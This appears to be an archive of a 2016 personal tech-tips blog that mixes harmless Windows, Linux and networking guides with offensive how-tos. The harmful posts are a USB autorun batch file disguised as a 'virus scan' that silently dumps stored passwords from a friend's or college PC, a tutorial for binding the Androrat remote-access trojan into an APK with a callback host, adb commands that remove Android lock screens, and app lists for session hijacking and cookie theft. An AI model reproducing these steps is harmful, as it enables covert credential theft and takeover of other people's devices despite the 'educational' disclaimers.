Monday, 31 October 2016

10 Best Password Cracking Tools


Disclaimer: it's publishing this list just for educational purposes. We don’t promote malicious and unethical practices.


why do we need to learn about password cracking and the tools used to do so? 
=The purpose of password cracking revolves around recovering the forgotten passwords of our online accounts, computers, and smartphones. Password cracking is also used by system administrators as a preventive measure. 

#####Types of password cracking attacks:

Here’s I’ll be listing various types of password cracking attacks that are generally used by attackers:
  • Dictionary attack: This attack uses a file that contains a list of words that are found in the dictionary. This mode matches different combinations of those words to crack your device open.
  • Brute force attack: Apart from the dictionary words, brute force attack makes use of non-dictionary words too.
  • Rainbow table attack: This attack comes along with pre-computed hashes. Thus, this method is faster.

There are lots of other password cracking techniques like phishing, spidering, social engineering, shoulder surfing etc. 


John the Ripper :- John the Ripper is one of the most popular password cracking tools available around. This free password cracking tool is chiefly written in C programming language. Encompassing a customizable password cracker, John the Ripper comes as a combination of many password crackers into one suite.

http://www.openwall.com/john/



Aircrack-ng :- In this free suite, you get a tool named aircrack that hackers use to crack WPA or WEP passwords. After analyzing the encrypted password packets, aircrack uses its cracking algorithm to break the passwords.

https://www.aircrack-ng.org/downloads.html


RainbowCrack :- As the name suggests, RainbowCrack makes use of rainbow tables to crack password hashes. Using a large-scale time-memory trade-off, RainbowCrack performs an advance cracking time computation.

http://project-rainbowcrack.com/


Cain and Abel :- This multi-purpose hacking tool also comes with the ability to sniff the networks, record VoIP conversations, recover network keys, decode scrambled passwords, and analyze routing protocols.

http://www.oxid.it/cain.html


THC Hydra :- Compared to other top password cracking tools, THC Hydra performs hacking attacks using numerous network protocols, including the likes of Asterisk, FTP, HTTP-Proxy, MYSQL, XMPP, Telnet, and more. Using these protocols, THC Hydra performs super fast brute-force and dictionary attacks against a login page.


https://www.thc.org/thc-hydra/


HashCat :- HashCat claims to be the fastest and most advanced password cracking software available. Released as a free and open source software, HashCat supports algorithm like MD4, MD5, Microsoft LM hashes, SHA-family, MySQL, Cisco PIX, and Unix Crypt formats.







########.  "THANKS DEAR FRIEND PLEASE VISIT AGAIN"

Tuesday, 25 October 2016

How To Hide A Folder Or File Under An Image In Linux

Before we start, create a directory containing an image file (.jpg or .png ), and the file or folder you wish to hide. Just for our example, we are going to hide a directory of files, named secret_files. Our original image file is htg-site.png. We use the cd command to change to the directory that has the image and the file or folder to be hidden.


We will now create compressed file that has the directory we want to hide in the image. To do this, we type the following command in the shell.
zip -r secret.zip secret_files/
In the command above, -r will include all the subdirectories that are within the specified directory in compressed file. The name of the compressed file we choose is  secret.zip and the name of the directory that it is to be compressed issecret_files.

When you are back at the command prompt, typels . You will now see the  secret.zip file listed.
Now, we are going to add the compressed file and image file together, and save the result as a new image file using the cat command. In our example, we type the following command at the prompt.
cat htg-site.png secret.zip > secret.png
First the original image file must be listed before the compressed file name you want to insert into the image file. Then, we direct the original image file and the compressed file to form a new image calledsecret.png .
While using the ls command at the prompt, you will see the new image file with the name secret.png, which is hiding the compressed file. You can now display new image using any image viewer.

Once you have your new image which hides your folder or file, you can delete the compressed file and the original file, using rm command. In our example, we went with the following two commands to delete our compressed file and the original folder.
rm secret.zip
rm -r secret_files

Now to access the hidden folder again, make sure you are in the directory that the image in which your file or folder is hidden. Now, extract the file or folder from the image by typing the below command.
unzip secret.png
Substitute the name of your image file with secret.png in the above command.

Our secret_files directory is available again, and when we change to that directory ( cd secret_files/ ), and list the files ( ls ), we see our original files.
######This  is not necessarily the most secure way to protect your files. It just makes them less obvious to someone poking around your system.

Running Windows Apps on Linux Using CrossOver 15

Running Windows Apps on Linux Using CrossOver 15

The CrossOver is a Windows compatibility layer based on Wine, for Linux and Mac OS developed by CodeWeavers Company.

Step By Step Procedure To Install CrossOver 15 And Run It

  • Download the CrossOver package from the official page of CodeWeavers.
  • The recommended method for installing CrossOver on debian based systems (Ubuntu, Mint, or Debian) is by using gdebi. Open the terminal and enter the below command:
sudogdebi crossover_15.0.1-1.deb
  • After installing the CrossOver, open the tool and Click on the “Install Windows Software“.
  • Next select a Windows application to be installed on Linux from the window displayed.
  • The application you choose is described shortly along with the ratings. The options for browsing available applications and displaying installed applications are also provided below it. Click on“Continue” to proceed further.
  • Now you will have to then select an installer source file and click “Continue”. For example here it is Microsoft Word 2007.exe file must be selected.
  • After the installation is successfully completed you will get a “Run Command” window. Browse and choose the .exe file and click on “Run”, which uses the MS Word bottle to run the application.


Note : CrossOver 15 is free of cost only for 14 days trial version after that you need to purchase it later to use it further.

How To Run Windows Applications On Linux

Step By Step Procedure To Install Wine And Run It

  • Open the terminal (Ctrl+Alt+T) and enter the command: sudo apt-get install wine.
  • Accept the Wine License and enter yes [y] to continue. Now Wine will get installed and now open the Wine tool, you will be asked about your task as to what would you want to do. Select“Install an app”.
  • Then a list of packages will appear on the window. Select what application you want from Windows on your Linux and click “OK”.
  • Now the selected app will get downloaded, wait for it to finish. For example here i have selected MS Paint to get in my Linux.

  • After have downloaded the required app, go to the Terminal and type: winename_of_application.exe. The app will get installed using wine command. Now your windows app is ready to be used on Linux.

How to Speed Up Your PC’s Performance

Effective Tips To Speed Up Your PC’s Performance :

Run Services Only When Required

Top list of services you can disable (you may disable) is as follows:
  • IP Helper: You can revoke this if you don’t use IPv6 Technology
  • Network Access Protection Agent: Revoke this if you don’t use network based works
  • Smart Cards: Leave this if you don’t use smart cards (Applicable for organizations)
  • Windows Media Center Receiver Service: Revoke this service if you don’t use Windows Media Center
  • Tablet PC Input Service: If you don’t use Tablet PC pen features
  • Fax: If you don’t use Fax services

ReadyBoost

In case if you cannot afford Solid State Drives then you can use Windows 7 in-built feature called ReadyBoost, which can use your removable storage devices for speeding up your Windows. 

Disk Defragmentation

Disk Defragmentation is the process of merging the fragmented files in your traditional Hard Drive. Windows has an in-built tool for defragmentation. You can use disk defragmentation in Windows 7 running on traditional HDDs in order to get more speed and performance. No major effect will be there if you are using SSDs.

Try Maintenance Tools

Sometime if you use maintenance tools such as CCleaner, Window Washer etc will help you boost your PC’s performance . These tools will help you in getting rid of temporary files and cache files, and hence speeding up PC.

How to disable Control Panel in Windows system

By disabling control panel will help you to secure your computer system settings from other user accounts.


Steps to disable Control Panel in Windows system


Step 1: Run command prompt and enter ‘gpedit.msc‘ or press ( ‘windows‘ button + r ). Local Group Policy will now be opened up.
Step 2: In left side of the panel click User ConfigurationAdministrative Templates > Control Panel.

 Step 3: In right side of the panel click open ‘Prohibit access to Control Panel and PC settings‘. Once opened up, now on the left top corner click ‘Enabled‘ from ‘Not Configured‘ and click ‘OK‘.
Now you have successfully disable Control Panel in your Windows system. You can enable it by repeating 1st two steps and on the 3rd step click ‘Not Configured‘ from ‘Enabled‘ and click ‘OK‘. 

Find Out If Any One Opens Your Computer Without Your Permission

In Windows, there is one in-built too will records all events in your computer called “Event Viewer”. This application records all your computer activities from login to log off etc.
The Event Viewer can be accessed in all Windows Operating system including Windows XP, Vista, Windows 7 and Windows 8.
Here, I”ll show you how to find the login events in Windows 8. To open the Event Viewer, type theeventvwr.msc in Run Command (Open run command Press Win + R Keys ) and press enter.
Now the Event Viewer utility will open, and many logs will be shown to you. To get login events of you computer click Windows logs -> System in the left panel.
The System log will show all the logs from kernel, Wireless network service start. There you can also find out the login event “Winlogon”. Just click the login event to display the properties of that event in the panel below.

Lock and unlock your computer with a USB drive

Anyone who attempts to access your computer without the USB flash drive will be hit with an epic “Access Denied” message. To get started, follow this guide:
Step 1: Download and install Predator.
Step 2: Once Predator launches, plug in your USB flash drive. None of the contents of the drive will be deleted or altered in any way, so feel free to use your primary thumbdrive.
When you insert the drive, a dialog box will appear asking you to create a password. Click OK to continue.
Step 3: In the Preferences window, take note of a few key settings. First, enter a secure, unique password in the “New password” field. If you lose your USB drive, you’ll use it to unlock your computer.
If you’d like, you can check the Always Required box and you’ll be asked to enter the password each time you use your thumbdrive to unlock your PC.
Finally, in the section under Flash Drives, ensure that the correct USB flash drive is selected. When you’re done, click “Create key” and then OK.
Step 4: Predator will exit. When it does, click the Predator icon in the taskbar to restart the program. A few seconds later, the icon will turn green, alerting you that Predator is running.
Every 30 seconds, Predator will check to see that your USB drive is plugged in. If it isn’t, your computer will dim and lock down.

Sunday, 23 October 2016

today i'm give to new method to unlock the mobile phone

METHOD 1
Solution For Everyone Before Lock Accident :

SMS Bypass - Download Link - Install It On Your Device (Download from attachments)
This App Allows You To Remotely Bypass Your Phone's Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.

INSTRUCTIONS:
1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:
Code:

secret_code reset

Example:
Code:

1234 reset

Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset - Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.



METHOD 2
Solution For Everyone Via Adb - SQL Command :

INSTRUCTIONS:
=>Type This Commands Separated In Your Terminal (CMD Prompt) :

Code:

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit

=>Now You Just Have To Reboot.

Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.


METHOD 3

Solution For Everyone Via Adb - File Removal :

INSTRUCTIONS:

=>Type This Command In Your Terminal (CMD Prompt) :
Code:

adb shell rm /data/system/gesture.key

Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.



METHOD 6

Solution For Everyone With USB Debugging Enabled :

INSTRUCTIONS:

Primary Step for all method:

Download & Extract to anywhere - Bypass Security Hack (Download from attachments)
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
Navigate to Browse data tab, At table there, click to list down the selection & selete secure


Instruction To Remove Pattern Lock:

Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone


Instruction To Remove PIN Lock:

Now, Find Or Create lockscreen.password_type, double-click & change it's value to 65536, Apply changes!
Now, find lock_pattern_autol

How to enable Developer Options in mobile phone higher version 5.0+

hello friends............\

just follow this steps:-

1. first you go to settings option.

2. go to About phone in settings option.

3. Scroll down a select Device Information you can see the "Build Number" in the option

4. tab 5-7 time quickly and you can see the your device in enable the developer option message prompting in few seconds .

5. back and see the settings option the developer option now showing use these option to improve the perform quality of the phone.



#######  THANKS

How To Change Default Boot Entry

In dual boot machine when we start the system it shows the list of both operating system at the time of booting if you want to change these entries, you can perform by following the below steps:-

#### check for dual booting by using msconfig command in run.

it will open system configuration utility where you can see two entries for dual boot machine.

you can be choose default OS auto run...........  



#######THANKS

Thursday, 20 October 2016

How to Disable Windows 10 Updates

Disable forced Windows 10 updates using command line

********* Now, type the following commands one by one in CMD, hit enter, and proceed:

net stop wuauserv
 
It stops the Windows Update service.

net stop bits
 
This command stops background intelligent transfer service.

net stop dosvc

It stops delivery optimization service.

Difference Between IPv4 and IPv6

IPv6 is the replacement for the IPv4 which is going to run out of its address space soon.

IPv4

The IPv4 or the Internet Protocol version 4 (RFC 791) was originally used in the ARPANET. Although, it’s the fourth generation of the Internet Protocol but it is the first major version of the Internet Protocol that finds its application for most of the internet. There is newer IPv6 which is in the process of being deployed.
According to IPv4, the IP addresses are actually in binary numbers in the form of 0s and 1s. But they can also be written as decimal numbers separated by a dot. This is done to ensure that they don’t bounce over our heads.
The IPv4 uses a 32-bit address space which is equivalent to 4 bytes. It means that the total number of IP addresses on the internet can go all the way to 2^32. That’s roughly 4.3 billion addresses.

IPv6

2^32 is a big number but it isn’t enough to accommodate the rising population of internet connected devices like laptops, tablets, smartphones, etc. Hence, the IPv6 protocol has been brought into existence. It has a big address space of 128-bits. And the total number of unique addresses are 2^128. So, the limit of IP addresses goes beyond the reach for many decades or maybe centuries.
The 128-bit IPv6 address looks a bit different than the IPv4 address. Each group separated by a colon (instead of a dot) represents 16-bits in the form of four hexadecimal digits . The 64 bits of the IPv6 address represent the network address which is used for routing and the rest 64 bits give details about the host’s network interface.



What’s the difference: IPv4 vs IPv6

The main difference between the IPv4 and IPv6 is their address space which takes IPv6 ages ahead of the IPv4 protocol. But it isn’t the only difference between the two. There are other things that make IPv6 a better option for the internet.

Security

IPv4 is old and it wasn’t created with much security aspects in mind. It presumes that the endpoint applications have security measures of their own. Still, it has managed to come this far. But the IPv6 is designed to make the journey of the packets more secure. Things, like checking for packet integrity and encrypting the data, have been soldered to the IPv6 which was an attachment in the case of its predecessor.

The IPv6 protocol is designed to ensure end-to-end security over a connection. A major addition IPSec includes cryptographic protocols to enable secure data communication. Authentication Header (AH) and Encapsulating Security Payload (ESP) protocols are part of IPSec which enable authentication and data integrity. ESP also ensures the data privacy. Another main protocol is the Internet Key Exchange (IKE) protocol which is used to set up and establish shared security attributes between two endpoint devices.

Better Quality of Service (QoS) in IPv6

The concept of QoS is very much similar for the IPv4 and IPv6. The contrast lies in the header fields which differentiate the packet processing during the transmission. In the IPv4 header, the 8-bit DS (Differentiated Services) field is used to classify the packet and what kind of service it is associated with. This check is done at almost every intermediate router present in the packet’s path.
The IPv6 header makes the process easier. Its header includes a 20-bit Flow Label field which enables quick processing of the packets. It allows routers to identify and handle packets belonging to the same flow i.e. the packets originating from a particular source and terminating to a particular destination. The flow is recognized by the combination of packet source and the value of Flow Label. The delivery of the packets becomes more efficient and thus, the improves the QoS.

IPv6 Stateless Auto-Configuration

The IPv6 protocol incorporates a feature known as neighbor discovery. This enables machines and routers on a network to find and talk to each other. A device can autoconfigure its IPv6 address and inform other devices. This eliminates the requirement of a DHCP server to auto-configure IP address for the device, as in the case of IPv4. This process is known as stateless auto-configuration
But we can’t kick out DHCP altogether. The stateless auto-configuration is not applicable in practical network scenarios. Thus, IPv6 also supports DHCPv6 which enables stateful auto-configuration through a DHCPv6 protocol.

How to make a blog

Firstly, BlogSpot is a blogging platform powered by Google.  It offers you an opportunity to start a blog.

1. Go to www.blogger.com using any browser. 

2. Sign in using your Google Account to get started. If you do not have a Google Account, click “Get Started” to create one.

3. Enter a “Display Name” to be used to sign your blog posts and click “Continue”.Click “Create Your Blog Now” .

 
4. Select a “Blog title” and an available URL for your blog. You can check if the URL you are considering is available by clicking "Check Availability"(if it is unavailable try adding more letters and don't use things like hyphens,under scores, colons etc).

5. Enter the word verification and click continue.

6. Choose a starter template, which will act as the basic design/layout of your blog.

7. Click “Start Blogging” . click New Post. 

8. You can create new blog posts, edit posts, and edit pages from under the “Posting” tab. 

9. The title of your post goes in the text box next to “Title”.

10. The “Post Options” section located underneath the “Compose” text editor will allow you to enable reader comments, HTML settings, and post the time and date. 



######## THANKS 
 
 
 

Top Android Apps for Hacking

1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009.

2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.

3.Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks.

4.Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses.

5. Anti-Android Network Toolkit:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

6. SSHDroid:- SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc).

7. WiFi Analyser:- Turns your android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.

8. Network Discovery:- Discover hosts and scan their ports in your Wifi network. A great tool for testing your network security.

9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers.

10. dSploit:-Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

11. Hackode:- The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

12.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

13.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

14.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications.

15.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.

17. AppUse:– Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

18. Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

19. Fing:- Find out which devices are connected to your Wi-Fi network, in just a few seconds.
Fast and accurate, Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues.

20.Drozer:- drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload.

21. WifiKill:– Second app, developed also by B.Ponury is an app which can kill connections and kick site-hoggers from the site. This app definitely kick then net user from the site so he cannot use it anymore. The app also offers the list of viewed sites by the hogger.

22. DroidSniff:– Similar to DroidSheep but with a newer and nicer interface is DroidSniff – sniffing app not only for Facebook. This app shows you what is the hogger looking for and then you can “take” his control, steal the cookies and rock’n’roll. Works perfectly.

23. Network Spoofer:– The last app, called NetWork Spoofer is very similar to dSploit but it’s more easier to use. Only hitch is that you need to have at least 500MB of free data. It offers you a lot of troll features – change Google searches, flip images, redirect websites, swap YouTube videos and others.

24. Droid SQLI:- allows you to test your MySQL based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: Time based injection, blind injection, error based injection, normal injection.

25. sqlmapchik:- is a cross-platform sqlmap GUI for the extremely popular sqlmap tool.

26. Whatsapp viewer:- is a simple forensic tool. It gives the access to whatsapp chat directly from sqlite databases, even from encrypted databases.

27. WhatsAPI:- Is a platform that allows you to send bulk messages through PHP. The script itself is simple.


How To Hack Android Phones

NOTE:-IS FOR EDUCATIONAL PURPOSES ONLY!

In this tutorial we are going to show you how to hack Android phones with Androrat.

Step1: Create an account on noip.com. 

### LINK HERE:- http://www.noip.com/download?page=win

Step2: Create a host on noip.com and enter Hostname and click Add Host

Step3: Now do port forwarding on your network. Port forwarding settings changes on each moderm, so google your moderm and find out how to do port forwarding.

Step4: Download Androrat Binder and enter the Hostname  and Port. Name the file and click Go. If you want to inject this file with another .apk file then go to Build + Bind tab name apk title and browse the location of the .apk and click Go.

Step5: Now download DUC (Dynamic DNS Update Client for Windows) and install

Step6: Open DUC and enter the host details which you have created in noip.com 

Step7: Download and run Androrat Project. Open Server tab on top and enter the port which you use on noip.com

Step8: Now run the .apk which is created by Androrat Binder on a Android Mobile.

How to capture passwords using USB drive

Note: This tutorial is only for educational purpose and do this at your own risk.

 Today I will show you how to capture Passwords using an USB Pen Drive.

Here is a step by step procedure to create the password toolkit:

Step 1: Download all the 5 tools (MessenPass, Mail PassView, IE Passview, PasswordFox ), extract them and copy only the executables(.exe files)into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.

Step 2: Create a new Notepad and write the following text into it:

 

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

 

save the Notepad and rename it from New Text Document.txt to launch.bat

Step 3: Copy the launch.bat file also to your USB drive.


Step 4:
Now your root kit is ready and you are all set to capture the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

Step 5: Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

In the pop-up window, select the first option (Perform a Virus Scan).
Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.This tutorial is only for educational purpose and do this at your own risk.

NOTE: You must temporarily disable your antivirus before following these steps.

####### Thanks

Wednesday, 19 October 2016

How To Create Ad-hoc Wireless Network in Win 8/8.1 using through CMD Command

through this method Create Ad-hoc Wireless network by using Command based:---------

Step 1:- Open the Command Prompt with Administrator priviledge.

Step 2:- Type the following cmd to ensure that ur network interface supports Hosted Network feature

                     netsh wlan show drivers

Step 3:- Run this cmd to configure wifi adhoc connection

             netsh wlan set hostednetwork mode=allow ssid=<ur name> key=<password>

Step 4:- Run the following command to start it.

             netsh wlan start hostednetwork




################ Thanks

How to solve Certificate Error during web browsing

If u r facing certificate error problem during web browsing.........

then follow these simple steps to solve this.

Step 1:- go to Date/Time Settings.

Step 2:- Change the Time Zone & Date/Time according to current Date/Time.

and enjoy the browsing...


Thanks dear.................

General PC Tips

  Adjust any setting on your PC with the Windows “God Mode” folder, which is a centralized Control Panel for all the OS settings. Access thi...